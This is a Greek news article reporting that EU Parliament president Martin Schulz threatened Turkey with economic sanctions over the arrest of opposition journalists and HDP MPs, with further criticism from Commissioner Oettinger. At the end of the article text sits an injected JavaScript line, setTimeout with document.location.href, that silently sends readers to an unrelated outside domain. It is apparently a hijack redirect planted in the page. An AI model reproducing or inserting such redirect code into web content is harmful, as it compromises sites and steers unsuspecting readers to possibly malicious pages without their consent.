Η Ευρώπη απειλεί με κυρώσεις τον Ερντογάν

0
3

 

Με επιβολή οικονομικών κυρώσεων απειλεί την τουρκική ηγεσία ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου Μάρτιν Σουλτς με αφορμή τις πρόσφατες συλλήψεις και προφυλακίσεις επικριτικών προς την κυβέρνηση δημοσιογράφων και βουλευτών του αντιπολιτευόμενου φιλοκουρδικού κόμματος HDP.

Τελευταία στη σειρά ήταν η προφυλάκιση του Ακίν Αταλάι, εκδότη της μεγαλύτερης αντιπολιτευόμενης εφημερίδας της Τουρκίας Τζουμχουριέτ, όπως μετέδωσε χθες τη νύχτα το τουρκικό πρακτορείο ειδήσεων Ανατολή. Ο Αταλάι, στον οποίο επιρρίπτεται η κατηγορία της συμμετοχής σε ένοπλη τρομοκρατική οργάνωση, είχε συλληφθεί την περασμένη Παρασκευή στο αεροδρόμιο Ατατούρκ της Κωνσταντινούπολης, όπου προσγειώθηκε επιστρέφοντας από τη Γερμανία.

Να συνεχιστεί ο διάλογος με την Τουρκία

Ο πρόεδρος του Ευρωκοινοβουλίου δήλωσε στην εφημερίδα Bild της Κυριακής ότι «θα πρέπει ως ΕΕ να σκεφθούμε τι είδους οικονομικά μέτρα θα μπορούσαμε να λάβουμε. Μέχρι το τέλος του χρόνου αναμένεται να μεταρρυθμιστεί η τελωνειακή ένωση, της οποίας είναι μέλος και η Τουρκία. Δεν μπορώ να φανταστώ ότι μετά από αυτό το κύμα συλλήψεων κατά βουλευτών της αντιπολίτευσης και δημοσιογράφων θα διευρύνουμε την τελωνειακή ένωση», δήλωσε με νόημα ο Μάρτιν Σουλτς, όπως αναδημοσιεύει η Deutsche Welle.

Παρά τις απειλές για επιβολή κυρώσεων κατά της Άγκυρας όμως, ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου υποστήριξε ότι δεν θα πρέπει να διακοπεί ο διάλογος της ΕΕ με την Τουρκία. Όπως εξήγησε, αν συμβεί αυτό «δεν θα έχουμε καμία δυνατότητα πλέον να βοηθήσουμε την αντιπολίτευση και τους φυλακισμένους».

Έκκληση στον Ερντογάν να επιδείξει σύνεση

Ο Μάρτιν Σουλτς δεν ήταν ο μόνος Ευρωπαίος αξιωματούχος που άσκησε κριτική στην τουρκική ηγεσία για τους τελευταίους χειρισμούς της. Ο Επίτροπος της ΕΕ για την Ψηφιακή Οικονομία και Κοινωνία Γκίντερ Έτινγκερ κάλεσε μέσα από τις σελίδες της κυριακάτικης Welt τον τούρκο πρόεδρο Ταγίπ Ερντογάν να επιδείξει περισσότερη σύνεση.

Ο Γερμανός επίτροπος υπογράμμισε ότι «αναμένω από τον πρόεδρο Ερντογάν (σ.σ. να μεριμνήσει ώστε) να μην γίνεται κατάχρηση των μέσων καταπολέμησης της τρομοκρατίας στην Τουρκία – τα οποία είναι πάντως πλήρως δικαιολογημένα – με τρόπο ώστε να πλήττονται αθώοι άνθρωποι και να παραβιάζονται επανειλημμένα τα θεμέλια του κράτους δικαίου».

Όπως τόνισε ο Γκίντερ Έτινγκερ, ο Τούρκος πρόεδρος «θα πρέπει να συγκρατηθεί και να κυβερνά τη χώρα του με δημοκρατικά μέσα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here